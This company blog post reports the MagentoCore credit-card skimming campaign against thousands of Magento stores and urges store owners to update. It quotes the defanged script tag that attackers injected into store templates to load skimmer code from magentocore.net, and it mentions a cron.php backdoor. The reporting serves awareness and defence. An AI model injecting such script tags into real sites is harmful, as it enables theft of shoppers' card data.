Why is a Magento update so important?

11.09.2018 Angelika Siczek

Within half a year, criminals placed malicious scripts in over 7,000 stores based on the Magento engine. As a result of this practice, hackers stole customers’ credit card data, gaining access to their bank accounts.

aktualizacja magento

According to expert Willem de Groot, who discovered the threat, this is the most aggressive script of this type created so far in the case of Magento. Hackers have already infected 7 339 Magento stores with a skimmer called MagentoCore, which retrieves data from credit cards from users who shopped on these sites. The malicious script loads into the store’s cash register and steals the card data provided by users and sends it to the server controlled by the attacker. Willem de Groot reported that the hacker campaign includes a skimmer script loaded from the magentocore.net domain.

The campaign is still ongoing, and hackers are attacking new Magento stores at a rate of 50 to 60 websites per day. Among the infected stores are also companies listed on the stock exchange that are worth millions. 1450 out of over 7339 infected stores based on the Magento platform had a malicious script placed in the code for half a year. At that time, the attacked sites did not react to the data leak. The rest of the stores took on average a few weeks.

When the attacker manages to break the page code, he adds an embedded JavaScript snippet to the HTML template:

‘<script type = “text / javascript” src = “hxxps: //magentocore.net/mage/mage.js”> </ script>’

The script has the task of registering the placing of orders by customers and sends them to the server “magentocore.net”. The malicious software adds a backdoor to cron.php, which will periodically download malicious code, and after running it removes itself. According to Bleeping Computer, in which Yonathan Klijnsma, a RiskIQ Threat Researcher, is quoted, the MagentoCore campaign is part of a larger card theft campaign called MageCart, which has been active since the end of 2015.

According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmers.

News Digitized / Stay Informed

Since the beginning of 2022, we are part of Unity Group. Now, by signing up for our newsletter, you will be kept up to date with information from our entire organization.

    By submitting the form you agree to receiving a newsletter that is sent by Unity S.A. based in Wrocław. You can withdraw your consent at any time. Additional information about the processing of available details provided in the privacy policy.



    Andrzej Szylar

    Chief Executive Officer



    Magdalena Paczyńska-Kamienik

    HR Manager



    Aleksandra Bielawska-Clegg

    HR Business Partner



    Michał Duława

    New Business Developer



    Katarzyna Zajchowska

    Marketing Partner